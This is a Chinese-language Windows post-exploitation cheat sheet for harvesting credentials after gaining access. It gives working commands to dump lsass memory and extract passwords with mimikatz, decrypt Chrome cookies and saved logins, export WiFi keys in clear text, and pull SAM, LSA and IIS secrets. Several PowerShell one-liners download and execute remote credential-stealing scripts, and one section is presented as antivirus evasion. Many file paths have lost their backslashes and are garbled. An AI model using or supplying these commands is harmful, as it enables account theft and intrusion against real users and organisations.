系統提權總結
1.1系統管理員密碼
A.常用來獲取windows密碼的工具
1.mimikatz
2.wce
3.getpass
4.QuarksPwDump
5.reg-sam
6.pwdump7
7.procdump.exe +mimikatz.
B.免殺抓取密碼的兩種方式
1.powershell "IEX (New-Object Net.WebClient).DownloadString(http://is.gd/oeoFuI);Invoke-Mimikatz -DumpCreds"
tips:powershell 默認windows visa後才有
2. procdump lsass 進程導出技巧
C: empprocdump.exe -accepteula -ma lsass.exelsass.dmp //For 32 bits
C: empprocdump.exe -accepteula -64 -ma lsass.exelsass.dmp //For 64 bits
然後本地使用mimikatz 還原密碼
1.2 其他用戶session、3389和ipc連接記錄、各用戶回收站信息收集
C.windows本地的信息收集、回收站的信息獲取
cmdkey /list
查看3389可信任鏈接 使用netpass.exe 即可知道密碼net use
查看到已建立連接記錄。也是直接可以
用wmic at sc 等直接執行命令的其中$I開頭的文件保存的是路徑信息,$R保存的是文件
FOR /f "skip=1 tokens=1,2 delims= " %c in (wmicuseraccount get name^,sid)do dir /a /b C:$Recycle.Bin\%d ^>%c.txt
$Recycler =(New-Object -ComObject Shell.Application).NameSpace(0xa);foreach($file in $Recycler.items()){$file.path;$file.ExtendedProperty("{9B174B33-40FF-11D2-A27E-00C04FC30871}2")++$file.name;$file.Type}
1.3 瀏覽器密碼和瀏覽器cookies的獲取 ie chromefirefox 等
D1.chrome為例 的密碼和cookies獲取
%localappdata%googlechromeUSERDA~1defaultLOGIND~1
%localappdata%googlechromeUSERDA~1defaultUSERDA~1
%localappdata%googlechromeUSERDA~1defaultcookies
chrome的用戶信息保存在本地文件為sqlite 資料庫格式
D2.mimikatz+WebBrowserPassView.exe獲取瀏覽器的密碼和cookie信息
mimikatz 讀取chrome cookies
mimikatz.exe privilege::debug log "dpapi::chrome/in:%localappdata%googlechromeUSERDA~1defaultcookies /unprotect" exit
mimikatz.exe privilege::debug log "dpapi::chrome/in:%localappdata%googlechromeUSERDA~1defaultUSERDA~1" exit
mimikatz.exe privilege::debug log "dpapi::chrome/in:%localappdata%googlechromeUSERDA~1defaultLOGIND~1" exit //讀chrome密碼
1.4 windows無線密碼獲取。資料庫密碼獲取
E.windows wifi密碼的獲取
netsh wlanexport profile interface=無線網路連接 key=clearfolder=C:
1.5 host文件獲取和dns緩存信息收集 等等
F.windowshosts/iis config
C:WindowsSystem32driversetchosts
windows7 windows2008等C:WINDOWSSYSTEM32DRIVERSETCHOSTS
windows2003位置提權情況下或者過了uac的情況下直接type一下就行了
iis-web路徑
iis6 =========>cscript.exe C:InetpubAdminScriptsadsutil.vbs ENUMW3SVC/1/root
iis7 ,8 =======>appcmd.exe
%systemroot%/system32/inetsrv/appcmd.exe list site ——列出網站列表
%systemroot%system32inetsrvappcmd.exe list vdir ——列出網站物理路徑
當然你也可以用mimikatz
mimiktaz 讀取iis7配置文件密碼
mimikatz.exe privilege::debug log "iis::apphost/in:"%systemroot%system32inetsrvconfigapplicationHost.config"/live" exit
1.6 殺軟 補丁 進程 網路代理信息wpad信息。軟體列表信息
G.ie瀏覽器的代理信息查看(網路代理信息wpad信息)
reg query "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternetSettings"
1.7 計劃任務 賬號密碼策略與鎖定策略 共享文件夾 web伺服器配置文件
H.windows logview
1.Windows2003下默認存在eventquery.vbs
cscript c:WINDOWSsystem32eventquery.vbs /fi "Datetimeeq 06/24/2015,01:00:00AM-06/24/2015,10:00:00AM" /l Security /V #查看SECURITY日誌 2015-6.24 上午1點-上午10點日誌
windows 7以上wevtutil 命令
2.查詢所有登錄、註銷相關的日誌語法
wevtutil qe security /rd:true /f:text /q:"*[system/eventid=4624and 4623 and 4627]" #
3.第三方信息收集工具LogParser.exepsloglist.exe等
1.8 vpn歷史密碼等 teamview密碼等 啟動項 iislog 等等
I.vpn密碼獲取為例
mimikatz.exeprivilege::debug token::elevate lsadump::sam lsadump::secrets exit
其他工具如Dialupass.exe感興趣可以看看mimikatz dpapi模塊的使用。很強大 sam 密碼 ipc連接密碼1.9 常用的後滲透信息收集工具。powershell+passrec的使用
J1.passrec intro
include:
vnc
vpn
router
ie firefox chrome
J2.powshellintro
FTP訪問、共享連接、putty連接 驅動、應用程序、hosts 文件、進程、無線網路記錄
powershell "IEX (New-ObjectNet.WebClient).DownloadString(
https://github.com/samratashok/nishang/tree/master/Gather/Gather/Get-Information.ps1);Get-Information"
正則過濾進程密碼,已測windows7
powershell IEX (New-Object System.Net.Webclient).DownloadString(https://raw.githubusercontent.com/putterpanda/mimikittenz/master/Invoke-mimikittenz.ps1); Invoke-mimikittenz
sqlserver密碼獲取工具Get-MSSQLCredentialPasswords.psm1 //未測
推薦閱讀: